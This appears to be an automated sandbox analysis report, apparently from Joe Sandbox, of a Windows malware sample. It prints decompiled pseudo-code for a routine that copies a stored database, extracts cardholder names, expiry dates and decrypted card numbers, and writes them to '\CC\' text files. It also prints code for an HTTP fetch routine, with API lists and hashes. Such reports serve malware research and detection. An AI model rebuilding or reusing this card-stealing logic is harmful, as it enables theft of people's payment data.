				 *((intOrPtr*)(_t143 - 0x258)) =  *((intOrPtr*)(_t143 + 0x18));
				_t124 = __ecx;
				E0041F6B0(_t143 - 0x118, 0, 0x104);
				 *0x4474e0(_t143 - 0x118,  *0x447058, 0x250);
				_t74 = 0x1a;
				 *0x4474e0(_t143 - 0x118, E00417BB8(_t74, _t152));
				CopyFileA(_t124, _t143 - 0x118, 1); // executed
				E0041F6B0(_t143 - 0x220, 0, 0x104);
				wsprintfA(_t143 - 0x220, "\\CC\\%s_%s.txt",  *((intOrPtr*)(_t143 - 0x24c)),  *((intOrPtr*)(_t143 - 0x248)));
				_t142 =  *0x446bf0; // 0x6e8a38
				_t86 =  *0x447304(_t143 - 0x118, _t143 - 0x250); // executed
				_t147 = _t144 + 0x30;
				if(_t86 == 0) {
					_t91 =  *0x4472b8( *((intOrPtr*)(_t143 - 0x250)), _t142, 0xffffffff, _t143 - 0x244, 0); // executed
					_t148 = _t147 + 0x14;
					if(_t91 == 0) {
						_t95 = RtlAllocateHeap(GetProcessHeap(), 0, 0xf423f); // executed
						 *(_t143 - 0x240) = _t95;
						_t96 =  *0x4472d4( *((intOrPtr*)(_t143 - 0x244)));
						_t155 = _t96 - 0x64;
						if(_t96 == 0x64) {
							_t142 = "\n";
							do {
								_t103 =  *0x4472f4( *((intOrPtr*)(_t143 - 0x244)), 0);
								_t124 = _t103;
								_t104 =  *0x4472f4( *((intOrPtr*)(_t143 - 0x244)), 1);
								 *((intOrPtr*)(_t143 - 0x24c)) = _t104;
								_t105 =  *0x4472f4( *((intOrPtr*)(_t143 - 0x244)), 2);
								 *((intOrPtr*)(_t143 - 0x248)) = _t105;
								 *0x4474e0( *(_t143 - 0x240), "Name: ");
								 *0x4474e0( *(_t143 - 0x240), _t103);
								 *0x4474e0( *(_t143 - 0x240), _t142);
								 *0x4474e0( *(_t143 - 0x240), "Month: ");
								 *0x4474e0( *(_t143 - 0x240),  *((intOrPtr*)(_t143 - 0x24c)));
								 *0x4474e0( *(_t143 - 0x240), _t142);
								 *0x4474e0( *(_t143 - 0x240), "Year: ");
								 *0x4474e0( *(_t143 - 0x240),  *((intOrPtr*)(_t143 - 0x248)));
								 *0x4474e0( *(_t143 - 0x240), _t142);
								 *0x4474e0( *(_t143 - 0x240), "Card: ");
								_push( *0x4472e8( *((intOrPtr*)(_t143 - 0x244)), 3,  *0x4472e0( *((intOrPtr*)(_t143 - 0x244)), 3,  *((intOrPtr*)(_t143 - 0x254)))));
								_t118 = E0040FA8C(_t103,  *((intOrPtr*)(_t143 - 0x25c)), _t143 - 0x23c, 0, _t142, _t155);
								_t148 = _t148 + 0x24;
								 *(_t143 - 4) = 0;
								if( *((intOrPtr*)(_t118 + 0x14)) >= 0x10) {
									_t118 =  *_t118;
								}
								 *0x4474e0( *(_t143 - 0x240), _t118);
								 *(_t143 - 4) =  *(_t143 - 4) | 0xffffffff;
								E00404A66(_t143 - 0x23c, 1, 0);
								 *0x4474e0( *(_t143 - 0x240), "\n\n");
								_push( *((intOrPtr*)(_t143 - 0x244)));
							} while ( *0x4472d4() == 0x64);
						}
						E0041EAE0( *((intOrPtr*)(_t143 - 0x258)), _t143 - 0x220, lstrlenA( *(_t143 - 0x240)), 3);
						E0041F6B0(_t143 - 0x240, 0, 4);
					}
					 *0x4472d8( *((intOrPtr*)(_t143 - 0x244)));
					 *0x447308( *((intOrPtr*)(_t143 - 0x250))); // executed
				}
				DeleteFileA(_t143 - 0x118); // executed
				return E004236C3(_t124, 0, _t142);
			}

0x00410302
0x0041030c
0x00410314
0x0041031d
0x00410326
0x0041032f
0x0041033e
0x0041034e
0x00410350
0x00410365
0x0041036d
0x0041037b
0x0041038b
0x0041039a
0x004103ba
0x004103c0
0x004103d4
0x004103da
0x004103df
0x004103f6
0x004103fc
0x00410401
0x00410414
0x00410420
0x00410426
0x0041042d
0x00410430
0x00410436
0x0041043b
0x00410442
0x00410450
0x00410452
0x00410460
0x00410466
0x0041047a
0x00410480
0x0041048d
0x0041049a
0x004104ab
0x004104bd
0x004104ca
0x004104db
0x004104ed
0x004104fa
0x0041050b
0x0041053e
0x00410545
0x0041054a
0x0041054d
0x00410554
0x00410556
0x00410556
0x0041055f
0x00410565
0x00410572
0x00410582
0x00410588
0x00410595
0x0041043b
0x004105c0
0x004105d2
0x004105d7
0x004105e0
0x004105ed
0x004105f3
0x004105fb
0x00410606

APIs

__EH_prolog3_GS.LIBCMT ref: 0041030C
_memset.LIBCMT ref: 00410350
lstrcat.KERNEL32(?,?), ref: 00410365

Part of subcall function 00417BB8: _malloc.LIBCMT ref: 00417BBE
Part of subcall function 00417BB8: GetTickCount.KERNEL32 ref: 00417BC9
Part of subcall function 00417BB8: _rand.LIBCMT ref: 00417BDE
Part of subcall function 00417BB8: wsprintfA.USER32 ref: 00417BF1

lstrcat.KERNEL32(?,00000000), ref: 0041037B
CopyFileA.KERNEL32(?,?,00000001), ref: 0041038B
_memset.LIBCMT ref: 0041039A
wsprintfA.USER32 ref: 004103BA
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0041040D
RtlAllocateHeap.NTDLL(00000000), ref: 00410414
lstrcat.KERNEL32(?,Name: ), ref: 00410480
lstrcat.KERNEL32(?,00000000), ref: 0041048D
lstrcat.KERNEL32(?,0043D130), ref: 0041049A
lstrcat.KERNEL32(?,Month: ), ref: 004104AB
lstrcat.KERNEL32(?,?), ref: 004104BD
lstrcat.KERNEL32(?,0043D130), ref: 004104CA
lstrcat.KERNEL32(?,Year: ), ref: 004104DB
lstrcat.KERNEL32(?,?), ref: 004104ED
lstrcat.KERNEL32(?,0043D130), ref: 004104FA
lstrcat.KERNEL32(?,Card: ), ref: 0041050B

Part of subcall function 0040FA8C: __EH_prolog3_GS.LIBCMT ref: 0040FA93
Part of subcall function 0040FA8C: _memcmp.LIBCMT ref: 0040FABC
Part of subcall function 0040FA8C: _memset.LIBCMT ref: 0040FAE5
Part of subcall function 0040FA8C: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,000000FF,00000000,-0000000C,?,?,00000000), ref: 0040FB20

lstrcat.KERNEL32(?,00000000), ref: 0041055F
lstrcat.KERNEL32(?,0043F4D8), ref: 00410582
lstrlenA.KERNEL32(?), ref: 004105A4
_memset.LIBCMT ref: 004105D2
DeleteFileA.KERNEL32(?), ref: 004105FB

Strings

Year: , xrefs: 004104D0
ZHaZea, xrefs: 00410426, 0041058E
Card: , xrefs: 00410500
Name: , xrefs: 0041046F
Month: , xrefs: 004104A0
\CC\%s_%s.txt, xrefs: 004103B4

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$FileH_prolog3_Heapwsprintf$AllocAllocateCopyCountDeleteLocalProcessTick_malloc_memcmp_randlstrlen
String ID: Card: $Month: $Name: $Year: $ZHaZea$\CC\%s_%s.txt
API String ID: 1330863641-2730206551
Opcode ID: eeae598a4ce23dbfed0e454293d47b537becb032c6a0a09d89a880d0a48708a3
Instruction ID: 8aac12d78deb354dce2fe546b66fd8bb1d0ad6b31c5f55cb5e192b896297e990
Opcode Fuzzy Hash: eeae598a4ce23dbfed0e454293d47b537becb032c6a0a09d89a880d0a48708a3
Instruction Fuzzy Hash: F9713776900128AFDB20AF60ED8DEDA7B79FB09315F1000E5F60DA2170DB754A91DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABDE Relevance: 47.9, APIs: 20, Strings: 7, Instructions: 629
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E0040ABDE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t295;
				void* _t298;
				void* _t301;
				void* _t302;
				void* _t304;
				void* _t305;
				int _t306;
				void* _t309;
				void* _t311;
				intOrPtr _t313;
				intOrPtr _t314;
				void* _t320;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t335;
				void* _t338;
				void* _t340;
				void* _t343;
				void* _t344;
				void* _t346;
				void* _t347;
				char* _t349;
				char* _t351;
				intOrPtr _t354;
				intOrPtr _t356;
				signed int _t357;
				char* _t369;
				void* _t370;
				char* _t372;
				void* _t373;
				int _t375;
				void* _t380;
				int _t394;
				long _t395;
				int _t398;
				int _t403;
				char* _t404;
				void* _t405;
				void* _t438;
				void* _t439;
				void* _t441;
				void* _t479;
				char* _t493;
				char* _t497;
				char* _t498;
				void* _t516;
				long _t520;
				void* _t529;
				void* _t530;

				_t530 = __eflags;
				_push(0x9ec);
				E00423679(E004339C8, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t529 - 0x9f0)) =  *((intOrPtr*)(_t529 + 8));
				 *(_t529 - 0x9e0) = 0;
				 *(_t529 - 4) = 0;
				E004049CF(_t529 - 0x9dc, 0x43d12c);
				_t295 = 0xf;
				 *((intOrPtr*)(_t529 - 0x920)) = _t295;
				 *((intOrPtr*)(_t529 - 0x924)) = 0;
				 *(_t529 - 0x934) = 0;
				 *((intOrPtr*)(_t529 - 0x93c)) = _t295;
				 *(_t529 - 0x940) = 0;
				 *(_t529 - 0x950) = 0;
				 *((intOrPtr*)(_t529 - 0x8e8)) = _t295;
				 *(_t529 - 0x8ec) = 0;
				 *((char*)(_t529 - 0x8fc)) = 0;
				 *((intOrPtr*)(_t529 - 0x974)) = _t295;
				 *((intOrPtr*)(_t529 - 0x978)) = 0;
				 *((char*)(_t529 - 0x988)) = 0;
				 *((intOrPtr*)(_t529 - 0x990)) = _t295;
				 *((intOrPtr*)(_t529 - 0x994)) = 0;
				 *((char*)(_t529 - 0x9a4)) = 0;
				 *((intOrPtr*)(_t529 - 0x9ac)) = _t295;
				 *((intOrPtr*)(_t529 - 0x9b0)) = 0;
				 *((char*)(_t529 - 0x9c0)) = 0;
				 *(_t529 - 4) = 7;
				 *(_t529 - 0x9e4) = 0;
				_t298 = E0040AA82(_t529 + 0xc, _t529 - 0x9dc, _t530, _t529 - 0x918);
				 *(_t529 - 4) = 8;
				E00404A22(_t529 - 0x8fc, _t298);
				 *(_t529 - 4) = 7;
				E00404A66(_t529 - 0x918, 1, 0);
				_t497 = "https://";
				_t301 = E004201E0(_t497);
				_push(_t497);
				_t302 = 8;
				if(E0040CDFB(_t302, _t529 - 0x8fc, _t301) != 0) {
					_t498 = "http://";
					_t304 = E004201E0(_t498);
					_push(_t498);
					_t305 = 7;
					_t306 = E0040CDFB(_t305, _t529 - 0x8fc, _t304);
					__eflags = _t306;
					if(_t306 == 0) {
						 *(_t529 - 0x9e4) = 7;
					}
				} else {
					 *(_t529 - 0x9e4) = 8;
				}
				_t437 = _t529 - 0x8fc;
				 *((char*)(_t529 - 0x9ec)) = 0x2f;
				_t309 = E0040CD72( *(_t529 - 0x9e4) + 1, _t529 - 0x8fc, _t529 - 0x9ec, 1);
				 *(_t529 - 0x9e8) = _t309;
				if(_t309 != 0xffffffff) {
					_t311 = E0040CD3B(_t437, _t529 - 0x918, _t529 - 0x8fc, _t309, 0xffffffff);
					 *(_t529 - 4) = 0xa;
					 *(_t529 - 0x9e0) = 2;
				} else {
					_t311 = E004049CF(_t529 - 0x96c, 0x43d12c);
					 *(_t529 - 4) = 9;
					 *(_t529 - 0x9e0) = 1;
				}
				_t502 = _t311;
				_t484 = _t529 - 0x934;
				E00404A22(_t529 - 0x934, _t311);
				if(( *(_t529 - 0x9e0) & 0x00000002) != 0) {
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) & 0xfffffffd;
					E00404A66(_t529 - 0x918, 1, 0);
				}
				 *(_t529 - 4) = 7;
				if(( *(_t529 - 0x9e0) & 0x00000001) != 0) {
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) & 0xfffffffe;
					E00404A66(_t529 - 0x96c, 1, 0);
				}
				_t438 =  *(_t529 - 0x9e8);
				_t313 =  *((intOrPtr*)(_t529 - 0x8fc));
				if(_t438 == 0xffffffff) {
					__eflags =  *((intOrPtr*)(_t529 - 0x8e8)) - 0x10;
					if(__eflags < 0) {
						_t313 = _t529 - 0x8fc;
					}
					_t438 =  *(_t529 - 0x8ec);
				} else {
					if( *((intOrPtr*)(_t529 - 0x8e8)) < 0x10) {
						_t313 = _t529 - 0x8fc;
					}
				}
				_t439 = _t438 + _t313;
				_t539 =  *((intOrPtr*)(_t529 - 0x8e8)) - 0x10;
				_t314 =  *((intOrPtr*)(_t529 - 0x8fc));
				if( *((intOrPtr*)(_t529 - 0x8e8)) < 0x10) {
					_t314 = _t529 - 0x8fc;
				}
				_push( *(_t529 - 0x9f4));
				_push(_t439);
				_push(_t314 +  *(_t529 - 0x9e4));
				_push(_t529 - 0x918);
				 *(_t529 - 0x904) = 0xf;
				 *((intOrPtr*)(_t529 - 0x908)) = 0;
				 *((char*)(_t529 - 0x918)) = 0;
				E0040D068(0, _t479, _t484, _t502, _t539);
				 *(_t529 - 4) = 0xb;
				E00404A22(_t529 - 0x950, _t529 - 0x918);
				 *(_t529 - 4) = 7;
				E00404A66(_t529 - 0x918, 1, 0);
				_t320 = E004201E0("#");
				_pop(_t441);
				if(E0040CD72(0, _t529 - 0x934, "#", _t320) == 0xffffffff) {
					_t325 = E00404E93(_t529 - 0x96c, _t529 - 0x934);
					 *(_t529 - 4) = 0xd;
					_t91 = _t529 - 0x9e0;
					 *_t91 =  *(_t529 - 0x9e0) | 0x00000008;
					__eflags =  *_t91;
				} else {
					_t325 = E0040CD3B(_t441, _t529 - 0x918, _t529 - 0x934, 0, _t323);
					 *(_t529 - 4) = 0xc;
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) | 0x00000004;
				}
				E00404A22(_t529 - 0x934, _t325);
				if(( *(_t529 - 0x9e0) & 0x00000008) != 0) {
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) & 0xfffffff7;
					E00404A66(_t529 - 0x96c, 1, 0);
				}
				 *(_t529 - 4) = 7;
				if(( *(_t529 - 0x9e0) & 0x00000004) != 0) {
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) & 0xfffffffb;
					E00404A66(_t529 - 0x918, 1, 0);
				}
				_t327 = E004201E0(":");
				_pop(_t442);
				_t330 = E0040CD72(0, _t529 - 0x950, ":", _t327);
				 *(_t529 - 0x9e8) = _t330;
				if(_t330 == 0xffffffff) {
					_t442 = _t529 - 0x96c;
					_t331 = E004049CF(_t529 - 0x96c, 0x43d12c);
					 *(_t529 - 4) = 0xf;
					_t116 = _t529 - 0x9e0;
					 *_t116 =  *(_t529 - 0x9e0) | 0x00000020;
					__eflags =  *_t116;
				} else {
					_t331 = E0040CD3B(_t442, _t529 - 0x918, _t529 - 0x950, _t330 + 1, 0xffffffff);
					 *(_t529 - 4) = 0xe;
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) | 0x00000010;
				}
				E00404A22(_t529 - 0x9a4, _t331);
				if(( *(_t529 - 0x9e0) & 0x00000020) != 0) {
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) & 0xffffffdf;
					_t442 = _t529 - 0x96c;
					E00404A66(_t529 - 0x96c, 1, 0);
				}
				 *(_t529 - 4) = 7;
				if(( *(_t529 - 0x9e0) & 0x00000010) != 0) {
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) & 0xffffffef;
					_t442 = _t529 - 0x918;
					E00404A66(_t529 - 0x918, 1, 0);
				}
				_t333 =  *(_t529 - 0x9e8);
				if( *(_t529 - 0x9e8) == 0xffffffff) {
					_t333 =  *(_t529 - 0x940);
				}
				_t335 = E0040CD3B(_t442, _t529 - 0x96c, _t529 - 0x950, 0, _t333);
				 *(_t529 - 4) = 0x10;
				E00404A22(_t529 - 0x950, _t335);
				_t443 = _t529 - 0x96c;
				 *(_t529 - 4) = 7;
				E00404A66(_t529 - 0x96c, 1, 0);
				if( *(_t529 - 0x9e4) <= 0) {
					_t338 = E004049CF(_t529 - 0x96c, 0x43d12c);
					 *(_t529 - 4) = 0x12;
					_t149 = _t529 - 0x9e0;
					 *_t149 =  *(_t529 - 0x9e0) | 0x00000080;
					__eflags =  *_t149;
				} else {
					_t338 = E0040CD3B(_t443, _t529 - 0x918, _t529 - 0x8fc, 0,  *(_t529 - 0x9e4) + 0xfffffffd);
					 *(_t529 - 4) = 0x11;
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) | 0x00000040;
				}
				E00404A22(_t529 - 0x988, _t338);
				if(( *(_t529 - 0x9e0) & 0x00000080) != 0) {
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) & 0xffffff7f;
					E00404A66(_t529 - 0x96c, 1, 0);
				}
				 *(_t529 - 4) = 7;
				if(( *(_t529 - 0x9e0) & 0x00000040) != 0) {
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) & 0xffffffbf;
					E00404A66(_t529 - 0x918, 1, 0);
				}
				_t340 = E004201E0("?");
				_pop(_t445);
				_t343 = E0040CD72(0, _t529 - 0x934, "?", _t340);
				 *(_t529 - 0x9e4) = _t343;
				if(_t343 == 0xffffffff) {
					_t445 = _t529 - 0x96c;
					_t344 = E004049CF(_t529 - 0x96c, 0x43d12c);
					 *(_t529 - 4) = 0x14;
					_t174 = _t529 - 0x9e0;
					 *_t174 =  *(_t529 - 0x9e0) | 0x00000200;
					__eflags =  *_t174;
				} else {
					_t344 = E0040CD3B(_t445, _t529 - 0x918, _t529 - 0x934, _t343 + 1, 0xffffffff);
					 *(_t529 - 4) = 0x13;
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) | 0x00000100;
				}
				E00404A22(_t529 - 0x9c0, _t344);
				if(( *(_t529 - 0x9e0) & 0x00000200) != 0) {
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) & 0xfffffdff;
					_t445 = _t529 - 0x96c;
					E00404A66(_t529 - 0x96c, 1, 0);
				}
				 *(_t529 - 4) = 7;
				if(( *(_t529 - 0x9e0) & 0x00000100) != 0) {
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) & 0xfffffeff;
					_t445 = _t529 - 0x918;
					E00404A66(_t529 - 0x918, 1, 0);
				}
				_t346 = _t529 - 0x934;
				if( *(_t529 - 0x9e4) == 0xffffffff) {
					_t347 = E00404E93(_t529 - 0x96c, _t346);
					 *(_t529 - 4) = 0x16;
					_t199 = _t529 - 0x9e0;
					 *_t199 =  *(_t529 - 0x9e0) | 0x00000800;
					__eflags =  *_t199;
				} else {
					_t347 = E0040CD3B(_t445, _t529 - 0x918, _t346, 0,  *(_t529 - 0x9e4));
					 *(_t529 - 4) = 0x15;
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) | 0x00000400;
				}
				E00404A22(_t529 - 0x934, _t347);
				_t493 = 1;
				if(( *(_t529 - 0x9e0) & 0x00000800) != 0) {
					 *(_t529 - 0x9e0) =  *(_t529 - 0x9e0) & 0xfffff7ff;
					E00404A66(_t529 - 0x96c, 1, 0);
				}
				 *(_t529 - 4) = 7;
				if(( *(_t529 - 0x9e0) & 0x00000400) != 0) {
					E00404A66(_t529 - 0x918, _t493, 0);
				}
				_t349 =  *(_t529 - 0x950);
				_t516 = 0x10;
				if( *((intOrPtr*)(_t529 - 0x93c)) < _t516) {
					_t349 = _t529 - 0x950;
				}
				DeleteUrlCacheEntry(_t349); // executed
				_t351 =  *(_t529 + 0xc);
				if( *((intOrPtr*)(_t529 + 0x20)) < _t516) {
					_t351 = _t529 + 0xc;
				}
				DeleteUrlCacheEntry(_t351);
				_t567 =  *((intOrPtr*)(_t529 + 0x28));
				if( *((intOrPtr*)(_t529 + 0x28)) == 0) {
					 *(_t529 - 0x9e0) = InternetOpenA(0x43d12c, 0, 0, 0, 0);
				} else {
					_t404 = E00417704(0, _t529 - 0x96c, _t493, _t516, _t567);
					 *(_t529 - 4) = 0x17;
					if(_t404[0x14] >= _t516) {
						_t404 =  *_t404;
					}
					_t405 = InternetOpenA(_t404, 0, 0, 0, 0); // executed
					 *(_t529 - 0x9e0) = _t405;
					 *(_t529 - 4) = 7;
					E00404A66(_t529 - 0x96c, _t493, 0);
				}
				_t354 =  *((intOrPtr*)(_t529 - 0x9a4));
				if( *((intOrPtr*)(_t529 - 0x990)) < _t516) {
					_t354 = _t529 - 0x9a4;
				}
				_push(_t354);
				 *(_t529 - 0x9e8) = E00421EE3();
				_t356 =  *((intOrPtr*)(_t529 - 0x988));
				if( *((intOrPtr*)(_t529 - 0x974)) < _t516) {
					_t356 = _t529 - 0x988;
				}
				_t357 =  *0x447510(_t356, "https");
				asm("sbb esi, esi");
				_t520 = ( ~_t357 & 0xff800000) + 0x4800000;
				if( *(_t529 - 0x9e0) == 0) {
					L86:
					_t493 =  *((intOrPtr*)(_t529 - 0x9f0));
					 *(_t493 + 0x14) = 0xf;
					 *((intOrPtr*)(_t493 + 0x10)) = 0;
					 *_t493 = 0;
					E00404A22(_t493, _t529 - 0x9dc);
					_t523 = 1;
					__eflags = 1;
					E00404A66(_t529 - 0x9c0, 1, 0);
					E00404A66(_t529 - 0x9a4, 1, 0);
					E00404A66(_t529 - 0x988, 1, 0);
					E00404A66(_t529 - 0x8fc, 1, 0);
					E00404A66(_t529 - 0x950, 1, 0);
					E00404A66(_t529 - 0x934, 1, 0);
					E00404A66(_t529 - 0x9dc, 1, 0);
					E00404A66(_t529 + 0xc, 1, 0);
					goto L87;
				} else {
					_t369 =  *(_t529 - 0x950);
					if( *((intOrPtr*)(_t529 - 0x93c)) < 0x10) {
						_t369 = _t529 - 0x950;
					}
					_t370 = InternetConnectA( *(_t529 - 0x9e0), _t369,  *(_t529 - 0x9e8), 0, 0, 3, _t520, 0); // executed
					 *(_t529 - 0x9e8) = _t370;
					if(_t370 == 0) {
						L85:
						InternetCloseHandle( *(_t529 - 0x9e0));
						goto L86;
					} else {
						_t372 =  *(_t529 - 0x934);
						if( *((intOrPtr*)(_t529 - 0x920)) < 0x10) {
							_t372 = _t529 - 0x934;
						}
						_t373 = HttpOpenRequestA( *(_t529 - 0x9e8), "GET", _t372, 0, 0, 0, _t520, 0); // executed
						 *(_t529 - 0x9e4) = _t373;
						if(_t373 == 0) {
							L84:
							InternetCloseHandle( *(_t529 - 0x9e8));
							goto L85;
						} else {
							_t375 = HttpSendRequestA(_t373, 0, 0, 0, 0); // executed
							_t523 = _t375;
							 *(_t529 - 0x9f4) = 0x100;
							if(HttpQueryInfoA( *(_t529 - 0x9e4), 0x13, _t529 - 0x110, _t529 - 0x9f4, 0) != 0) {
								_push(_t529 - 0x110);
								_t380 = E00421EE3();
								__eflags = _t380 - 0xc8;
								if(_t380 != 0xc8) {
									goto L77;
								}
								__eflags = _t523;
								if(_t523 == 0) {
									L83:
									InternetCloseHandle( *(_t529 - 0x9e4));
									goto L84;
								}
								_t394 = InternetReadFile( *(_t529 - 0x9e4), _t529 - 0x8e0, 0x7cf, _t529 - 0x9f8); // executed
								__eflags = _t394;
								if(_t394 == 0) {
									goto L83;
								} else {
									goto L81;
								}
								while(1) {
									L81:
									_t395 =  *(_t529 - 0x9f8);
									__eflags = _t395;
									if(__eflags == 0) {
										goto L83;
									}
									 *((char*)(_t529 + _t395 - 0x8e0)) = 0;
									_push(_t529 - 0x8e0);
									_push(_t529 - 0x918);
									_t398 = E0040CEE5(0, _t529 - 0x9dc, _t523, __eflags); // executed
									_t523 = _t398;
									 *(_t529 - 4) = 0x18;
									E00404A22(_t529 - 0x9dc, _t398);
									 *(_t529 - 4) = 7;
									E00404A66(_t529 - 0x918, 1, 0);
									_t403 = InternetReadFile( *(_t529 - 0x9e4), _t529 - 0x8e0, 0x7cf, _t529 - 0x9f8); // executed
									__eflags = _t403;
									if(_t403 != 0) {
										continue;
									}
									goto L83;
								}
								goto L83;
							}
							L77:
							E004049CF( *((intOrPtr*)(_t529 - 0x9f0)), "ERROR");
							E00404A66(_t529 - 0x9c0, _t493, 0);
							E00404A66(_t529 - 0x9a4, _t493, 0);
							E00404A66(_t529 - 0x988, _t493, 0);
							E00404A66(_t529 - 0x8fc, _t493, 0);
							E00404A66(_t529 - 0x950, _t493, 0);
							E00404A66(_t529 - 0x934, _t493, 0);
							E00404A66(_t529 - 0x9dc, _t493, 0);
							E00404A66(_t529 + 0xc, _t493, 0);
							L87:
							return E004236C3(0, _t493, _t523);
						}
					}
				}
			}

0x0040abde
0x0040abde
0x0040abe8
0x0040abf2
0x0040abf8
0x0040ac09
0x0040ac0c
0x0040ac13
0x0040ac14
0x0040ac1a
0x0040ac20
0x0040ac26
0x0040ac2c
0x0040ac32
0x0040ac38
0x0040ac3e
0x0040ac44
0x0040ac4a
0x0040ac50
0x0040ac56
0x0040ac5c
0x0040ac62
0x0040ac68
0x0040ac6e
0x0040ac74
0x0040ac7a
0x0040ac8a
0x0040ac8e
0x0040ac94
0x0040aca2
0x0040aca6
0x0040acb4
0x0040acb8
0x0040acbd
0x0040acc3
0x0040acc9
0x0040acce
0x0040acdc
0x0040acea
0x0040acf0
0x0040acf6
0x0040acfb
0x0040ad02
0x0040ad07
0x0040ad09
0x0040ad0b
0x0040ad0b
0x0040acde
0x0040acde
0x0040acde
0x0040ad26
0x0040ad2e
0x0040ad35
0x0040ad3a
0x0040ad43
0x0040ad71
0x0040ad76
0x0040ad7d
0x0040ad45
0x0040ad50
0x0040ad55
0x0040ad59
0x0040ad59
0x0040ad87
0x0040ad89
0x0040ad8f
0x0040ad9b
0x0040ad9d
0x0040adad
0x0040adad
0x0040adb2
0x0040adc0
0x0040adc2
0x0040add2
0x0040add2
0x0040add7
0x0040addd
0x0040ade6
0x0040adf9
0x0040ae00
0x0040ae02
0x0040ae02
0x0040ae08
0x0040ade8
0x0040adef
0x0040adf1
0x0040adf1
0x0040adef
0x0040ae0e
0x0040ae10
0x0040ae17
0x0040ae1d
0x0040ae1f
0x0040ae1f
0x0040ae25
0x0040ae31
0x0040ae32
0x0040ae39
0x0040ae3a
0x0040ae44
0x0040ae4a
0x0040ae50
0x0040ae61
0x0040ae65
0x0040ae6f
0x0040ae73
0x0040ae7e
0x0040ae83
0x0040ae97
0x0040aec7
0x0040aecc
0x0040aed3
0x0040aed3
0x0040aed3
0x0040ae99
0x0040aea8
0x0040aead
0x0040aeb1
0x0040aeb1
0x0040aee2
0x0040aeee
0x0040aef0
0x0040af00
0x0040af00
0x0040af05
0x0040af13
0x0040af15
0x0040af25
0x0040af25
0x0040af30
0x0040af35
0x0040af41
0x0040af46
0x0040af4f
0x0040af79
0x0040af7f
0x0040af84
0x0040af8b
0x0040af8b
0x0040af8b
0x0040af51
0x0040af62
0x0040af67
0x0040af6b
0x0040af6b
0x0040af9a
0x0040afa6
0x0040afa8
0x0040afb2
0x0040afb8
0x0040afb8
0x0040afbd
0x0040afcb
0x0040afcd
0x0040afd7
0x0040afdd
0x0040afdd
0x0040afe2
0x0040afeb
0x0040afed
0x0040afed
0x0040b002
0x0040b00f
0x0040b013
0x0040b01b
0x0040b021
0x0040b025
0x0040b030
0x0040b067
0x0040b06c
0x0040b073
0x0040b073
0x0040b073
0x0040b032
0x0040b04a
0x0040b04f
0x0040b053
0x0040b053
0x0040b085
0x0040b091
0x0040b093
0x0040b0a6
0x0040b0a6
0x0040b0ab
0x0040b0b9
0x0040b0bb
0x0040b0cb
0x0040b0cb
0x0040b0d6
0x0040b0db
0x0040b0e7
0x0040b0ec
0x0040b0f5
0x0040b122
0x0040b128
0x0040b12d
0x0040b134
0x0040b134
0x0040b134
0x0040b0f7
0x0040b108
0x0040b10d
0x0040b111
0x0040b111
0x0040b146
0x0040b155
0x0040b157
0x0040b164
0x0040b16a
0x0040b16a
0x0040b16f
0x0040b180
0x0040b182
0x0040b18f
0x0040b195
0x0040b195
0x0040b1a1
0x0040b1a7
0x0040b1d3
0x0040b1d8
0x0040b1df
0x0040b1df
0x0040b1df
0x0040b1a9
0x0040b1b7
0x0040b1bc
0x0040b1c0
0x0040b1c0
0x0040b1f1
0x0040b1f8
0x0040b203
0x0040b205
0x0040b217
0x0040b217
0x0040b21c
0x0040b22d
0x0040b237
0x0040b237
0x0040b23c
0x0040b244
0x0040b24b
0x0040b24d
0x0040b24d
0x0040b254
0x0040b25a
0x0040b260
0x0040b262
0x0040b262
0x0040b266
0x0040b26c
0x0040b26f
0x0040b2ba
0x0040b271
0x0040b277
0x0040b27c
0x0040b283
0x0040b285
0x0040b285
0x0040b28c
0x0040b29a
0x0040b2a0
0x0040b2a4
0x0040b2a4
0x0040b2c0
0x0040b2cc
0x0040b2ce
0x0040b2ce
0x0040b2d4
0x0040b2da
0x0040b2e0
0x0040b2ed
0x0040b2ef
0x0040b2ef
0x0040b2fb
0x0040b305
0x0040b30d
0x0040b319
0x0040b524
0x0040b524
0x0040b52a
0x0040b531
0x0040b53a
0x0040b53c
0x0040b544
0x0040b544
0x0040b54c
0x0040b559
0x0040b566
0x0040b573
0x0040b580
0x0040b58d
0x0040b59a
0x0040b5a4
0x00000000
0x0040b31f
0x0040b326
0x0040b32c
0x0040b32e
0x0040b32e
0x0040b347
0x0040b34d
0x0040b355
0x0040b518
0x0040b51e
0x00000000
0x0040b35b
0x0040b362
0x0040b368
0x0040b36a
0x0040b36a
0x0040b381
0x0040b387
0x0040b38f
0x0040b50c
0x0040b512
0x00000000
0x0040b395
0x0040b39a
0x0040b3a1
0x0040b3b9
0x0040b3cb
0x0040b457
0x0040b458
0x0040b45e
0x0040b463
0x00000000
0x00000000
0x0040b469
0x0040b46b
0x0040b500
0x0040b506
0x00000000
0x0040b506
0x0040b48a
0x0040b490
0x0040b492
0x00000000
0x00000000
